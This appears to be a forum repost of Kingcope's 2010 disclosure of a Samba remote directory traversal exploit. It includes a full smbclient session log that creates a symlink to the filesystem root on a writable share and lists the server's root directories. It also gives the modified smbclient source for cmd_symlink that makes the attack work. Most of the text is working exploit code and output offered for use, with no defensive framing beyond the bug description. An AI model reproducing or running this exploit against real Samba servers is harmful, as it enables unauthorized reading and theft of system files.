Re: Samba Remote Zero-Day Exploit

Samba Remote Directory Traversal
logic fuckup discovered & exploited by Kingcope in 2010

It seems there was a quite similar bug found back in 2004:
http://marc.info/?l=bugtraq&m=109658688505723&w=2

A remote attacker can read, list and retrieve nearly all files on the System remotely.
Required is a valid samba account for a share which is writeable OR
a writeable share which is configured to be a guest account share,
in this case this is a preauth exploit.

The attacker can write for example into /tmp or where the account
he is connecting with has access to (/home/<user> etc).

Exploit session (using the patched smbclient exploit):

smb is a samba user created.

root@nr-pentest:~/Downloads/samba-3.4.5/source3# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -Usmb //<host>/testmount/
Enter smb's password:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]
smb: \> ls
. D 0 Wed Feb 3 14:27:03 2010
… D 0 Wed Feb 3 14:19:13 2010
test D 0 Wed Feb 3 14:19:13 2010
xxx A 1955 Wed Feb 3 14:22:42 2010

            45503 blocks of size 2097152. 24437 blocks available

smb: \> symlink …/…/…/…/…/ foobar
smb: \> ls
. D 0 Wed Feb 3 14:27:47 2010
… D 0 Wed Feb 3 14:19:13 2010
xxx A 1955 Wed Feb 3 14:22:42 2010
foobar D 0 Mon Feb 1 20:29:12 2010

            45503 blocks of size 2097152. 24437 blocks available

smb: \> ls …
NT_STATUS_OBJECT_PATH_SYNTAX_BAD listing \…

            45503 blocks of size 2097152. 24437 blocks available

smb: \> cd foobar
smb: \foobar\> ls
. D 0 Mon Feb 1 20:29:12 2010
… D 0 Mon Feb 1 20:29:12 2010
initrd.img.old 7646184 Mon Jan 18 13:15:48 2010
boot.ini 18832 Mon Feb 1 20:29:12 2010
home D 0 Mon Jan 18 13:08:24 2010
initrd.img 8007195 Thu Jan 21 21:51:26 2010
.cache DH 0 Sat Jan 23 14:19:08 2010
opt D 0 Sat Jan 30 11:39:59 2010
lib D 0 Thu Jan 21 21:13:01 2010
usr D 0 Sun Jan 31 22:08:11 2010
.libs DH 0 Thu Jan 21 12:30:48 2010
var D 0 Sun Jan 31 21:14:42 2010
bin D 0 Mon Jan 18 13:31:14 2010
selinux D 0 Tue Oct 20 01:05:22 2009
root D 0 Tue Feb 2 19:43:59 2010
vmlinuz.old 3890400 Fri Oct 16 20:03:49 2009
vmlinuz 3890560 Thu Dec 10 20:33:26 2009
etc D 0 Wed Feb 3 14:17:29 2010
srv D 0 Sat Jan 23 20:17:29 2010
proc DR 0 Wed Feb 3 14:10:41 2010
dev D 0 Wed Feb 3 14:11:02 2010
boot D 0 Thu Jan 21 21:51:26 2010
mnt D 0 Sat Jan 23 19:26:23 2010
media D 0 Fri Jan 29 08:32:31 2010
cdrom D 0 Mon Jan 18 12:40:11 2010
tmp D 0 Wed Feb 3 14:26:20 2010
sbin D 0 Thu Jan 21 21:50:58 2010
lost+found D 0 Mon Jan 18 12:39:57 2010
sys D 0 Wed Feb 3 14:10:41 2010

            45503 blocks of size 2097152. 24437 blocks available

smb: \foobar\>

put and get works in the folder now!

list open shares, this is normal operation mode not an exploit:

root@nr-pentest:~/Downloads/samba-3.4.5/source3/client# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -L //<host>/
Enter root's password:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]

    Sharename       Type      Comment
    ---------       ----      -------
    testmount       Disk                                                            // < this share is writable and exploitable!!
    print$          Disk      Printer Drivers
    IPC$            IPC       IPC Service (nr-pentest server (Samba, Ubuntu))

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]

    Server               Comment
    ---------            -------
    NR-PENTEST           nr-pentest server (Samba, Ubuntu)

    Workgroup            Master
    ---------            -------
    WORKGROUP            NR-PENTEST

smbclient patch (exploit):

samba-3.4.5/source3/client/client.c
/****************************************************************************
UNIX symlink.
****************************************************************************/

static int cmd_symlink(void)
{
TALLOC_CTX *ctx = talloc_tos();
char *oldname = NULL;
char *newname = NULL;
char *buf = NULL;
char *buf2 = NULL;
char *targetname = NULL;
struct cli_state *targetcli;

    if (!next_token_talloc(ctx, &cmd_ptr,&buf,NULL) ||
        !next_token_talloc(ctx, &cmd_ptr,&buf2,NULL)) {
            d_printf("symlink <oldname> <newname>\n");
            return 1;
    }
    oldname = talloc_asprintf(ctx,                  
                    "%s",                           // << HERE modified
                    buf);                           
    if (!oldname) {
            return 1;
    }
    newname = talloc_asprintf(ctx,
                    "%s",                           // << HERE modified
                    buf2);
    if (!newname) {
            return 1;
    }

/* ORIGINAL SMBCLIENT SOURCE LINES TO BE MODIFIED (SEE ABOVE).
oldname = talloc_asprintf(ctx,
"%s%s", // < modified (see above)
client_get_cur_dir(), // < removed (see above)
buf);
if (!oldname) {
return 1;
}
newname = talloc_asprintf(ctx,
"%s%s", // < modified (see above)
client_get_cur_dir(), // < removed (see above)
buf2);
if (!newname) {
return 1;
}
----------------------------------------------*/

    if (!cli_resolve_path(ctx, "", auth_info, cli, oldname, &targetcli, &targetname)) {
            d_printf("link %s: %s\n", oldname, cli_errstr(cli));
            return 1;

    }

    if (!SERVER_HAS_UNIX_CIFS(targetcli)) {
            d_printf("Server doesn't support UNIX CIFS calls.\n");
            return 1;
    }

    if (!cli_unix_symlink(targetcli, targetname, newname)) {
            d_printf("%s symlinking files (%s -> %s)\n",
                    cli_errstr(targetcli), newname, targetname);
            return 1;
    }

    return 0;

}

// Cheers,
// kcope